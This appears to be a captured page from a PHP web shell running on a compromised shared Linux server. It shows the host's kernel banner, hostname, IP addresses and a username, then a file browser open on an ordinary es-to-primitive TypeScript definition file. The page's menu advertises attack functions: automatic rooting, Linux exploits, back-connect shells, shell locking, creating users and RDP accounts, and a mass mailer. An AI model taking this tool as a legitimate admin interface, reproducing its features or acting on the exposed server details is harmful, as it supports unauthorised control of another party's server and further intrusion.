Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
es-to-primitive /
[ HOME SHELL ]
Name
Size
Permission
Action
es2015.d.ts
181
B
-rw-r--r--
es5.d.ts
181
B
-rw-r--r--
es6.d.ts
83
B
-rw-r--r--
index.d.ts
582
B
-rw-r--r--
package.json
856
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for es-to-primitive 1.2 // Project: https://github.com/ljharb/es-to-primitive#readme // Definitions by: ExE Boss <https://github.com/ExE-Boss> // Jordan Harband <https://github.com/ljharb> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped import ES5 = require('./es5'); import ES6 = require('./es6'); import ES2015 = require('./es2015'); declare const ToPrimitive: typeof ES2015 & { readonly ES5: typeof ES5; /** @deprecated */ readonly ES6: typeof ES6; readonly ES2015: typeof ES2015; }; export = ToPrimitive;
Close